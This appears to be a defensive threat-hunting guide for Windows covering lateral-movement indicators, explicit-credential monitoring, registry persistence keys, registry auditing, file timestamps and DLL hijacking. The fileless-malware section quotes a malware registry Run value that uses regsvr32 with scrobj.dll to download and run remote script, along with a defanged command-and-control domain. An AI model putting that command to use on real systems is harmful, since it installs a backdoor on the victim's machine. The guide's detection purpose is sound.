Detecting lateral movement
Typically, the endpoint first compromised by an attacker isn't their final objective
Most people don't put their crown jewel database in the DMZ
In order to find their final objective, attackers need to undergo an exploratory phase, moving laterally throughout the network
The actions taken during this exploratory phase can be a helpful indicator
Processes
Once an adversary has gained access to a machine, they perform reconnaissance
Username, privilege level, running services, other reachable machines, etc
While they can use specialized malware for doing this, legitimate system processes work just as well:
Windows: net.exe, ipconfig.exe, whoami.exe, nbstat.exe, etc
The attacker will use these processes within a shorter than usual period of time
This deviation is a potential indicator of attack
Explicit credentials use (Windows)
Windows provides users with the ability to authenticate using explicit credentials
This is designed to allow batch operations
Explicit credentials are also used in pass-the-hash attacks
Use of explicit credentials should be monitored on Windows machines:
Authorized uses should be whitelisted
Unauthorized use should be investigated as a potential attack
Hunting for registry and system file changes
The Windows registry and system files have a lot of power on the system
Registry decides what is run at boot
System files can be run with elevated privileges
When hunting for threats in a Windows registry or system files, check for the following:
Registry persistence mechanisms
Changes to the registry
File creation/modify dates
Evidence of DLL hijacking
Registry persistence mechanisms
As mentioned previously, the registry is a common target for malware attempting to achieve persistence across reboots
Registry keys of interest include:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Registry changes
Fileless malware
Fileless malware has become more common lately to avoid antivirus detection
JS_POWMET uses an AutoStart registry procedure to download itself to the system:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run COM+ ="regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll"
This installs the PowerShell script backdoor trojan TROJ_PSINJECT and connects to the following website:
hxxps://bogerando[.]ru/favicon
Enabling registry auditing
Registry auditing is a feature offered by Windows to help detect malware's use of the registry as a persistence mechanism
Activating registry auditing is one of the security settings available under Active Directory or local group policy
Once auditing is enabled, you will need to use regedit.exe to open the registry and then manually choose every key that you would like to monitor
Checking file timestamps
File timestamps can be a valuable indicator of compromise when system files are modified
Most files in these directories should have the same or similar timestamps (when the system was last installed/updated)
Any exe or dll with a different extension may be worth investigating
Look for timestamps near the time of the suspected attack
Timestamps can be modified using time stomping, but this is more involved process
Not all attackers will take the time and effort to change all versions of a file's timestamp
Hunting for system file changes
DLLs and drivers are other potential targets of an advanced adversary
These files may be run by trusted processes, allowing malicious code to run in a trusted process, potentially with elevated permissions
Examination of DLLs and drivers (using driverquery) for anomalous values can be valuable for threat hunting
Last updated